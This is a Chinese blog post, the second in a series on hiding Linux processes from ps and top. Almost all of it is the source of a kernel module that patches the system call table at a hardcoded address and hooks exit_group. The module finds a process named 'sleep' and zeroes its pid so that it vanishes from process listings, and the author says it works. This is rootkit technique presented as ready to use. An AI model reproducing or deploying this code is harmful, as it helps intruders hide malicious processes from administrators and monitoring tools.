linux下如何隐藏进程(ps/top)（二）

前一篇关于隐藏进程的博客中，提到了两个问题，

1）进程不能自己退出

2）进程不能有中断信号

strace命令调查，发现进程正常退出时调用的是exit_group函数，对应的内核的函数是sys_exit_group（）

hook之：

=============================================================================================================================

#include <linux/kernel.h>

#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/list.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <linux/uaccess.h>
#include <asm-i386/cacheflush.h>
#include <asm/mman.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("JASON.LIN.YU");

static pid_t old_pid = 0;
static unsigned long **sys_call_table =(unsigned long **) 0xc06294e0;
static char * mystring = "sleep";
static void (*old_sys_exit_group)(int);
static int set_pg_rw(long unsigned int _addr)
{
        struct page* pg;
        pgprot_t prot;
        pg = virt_to_page(_addr);
        prot.pgprot = VM_READ|VM_WRITE;
        return change_page_attr(pg, 1, prot);
}

static int set_pg_r(long unsigned int _addr)
{
        struct page* pg;
        pgprot_t prot;
        pg = virt_to_page(_addr);
        prot.pgprot = VM_READ;
        return change_page_attr(pg, 1, prot);
}

asmlinkage void new_sys_exit_group(int errcode)
{
        if( 0 == current->pid){
                current->pid = old_pid;
        }
        old_sys_exit_group(errcode);
}
int start_module(void)
{
        struct list_head* list = NULL;
        struct task_struct *task = NULL;

        set_pg_rw((long unsigned int )sys_call_table);
        old_sys_exit_group = sys_call_table[__NR_exit_group];
        sys_call_table[__NR_exit_group] = new_sys_exit_group;
        set_pg_r((long unsigned int)sys_call_table);

        list_for_each(list, &current->tasks){
                task = list_entry(list, struct task_struct, tasks);
                if(0 == memcmp(mystring, task->comm, strlen(mystring))){
                        old_pid = task->pid;
                        task->pid = 0;
                        break;
                }
        }

        task = find_task_by_pid(old_pid);
        task->pid = 0;
        return 0;
}

void clean_module(void)
{
        struct list_head* list;
        struct task_struct *task = NULL;

        list_for_each(list, &current->tasks){
                task = list_entry(list, struct task_struct, tasks);
                if( 0 == memcmp(mystring, task->comm, strlen(mystring))){
                        task->pid = old_pid;
                        break;
                }
        }

        set_pg_rw((long unsigned int)sys_call_table);
        sys_call_table[__NR_exit_group] = old_sys_exit_group;
        set_pg_r((long unsigned int)sys_call_table);
        return;
}

module_init(start_module);

module_exit(clean_module);

=============================================================================================================================

好使